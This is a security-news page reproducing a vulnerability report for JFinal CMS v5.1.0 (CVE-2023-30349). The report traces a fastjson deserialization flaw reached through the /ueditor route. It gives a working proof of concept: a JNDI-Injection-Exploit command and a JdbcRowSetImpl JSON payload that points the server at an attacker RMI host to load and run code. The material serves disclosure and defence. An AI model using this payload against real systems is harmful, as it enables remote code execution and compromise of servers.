Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-30349: jfinal CMS v5.1.0 has a command execution vulnerability exists · Issue #54 · jflyfox/jfinal_cms

JFinal CMS v5.1.0 was discovered to contain a remote code execution (RCE) vulnerability via the ActionEnter function.

CVE
Open in Source
#vulnerability#web#js#java#rce

jfinal_cms version:5.1.0
JDK version : jdk-8u351

The ActionEnter class is instantiated in the index method of the /ueditor route

The ConfigManager class is instantiated in the constructor of the ActionEnter class

The construction method of ConfigManager calls initEnv()

Call JSONObject.parseObject to parse the file content, and the file content here is controllable, just replace the file content with the payload.

The file comes from WEB-INF/classes/config.json. With any file upload vulnerability in the background, this file can be replaced with a file containing the payload to trigger fastjson deserialization

Run the tool on kali

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe"

payload:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.0.110:1099/d0inxc",
        "autoCommit":true
    }
}

Replace with payload

Visit /ueditor, execute the command to pop up the calculator

Related news

GHSA-8qhm-ch8h-xgjr: Remote code execution in JFinal CMS

JFinal CMS v5.1.0 was discovered to contain a remote code execution (RCE) vulnerability via the ActionEnter function.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE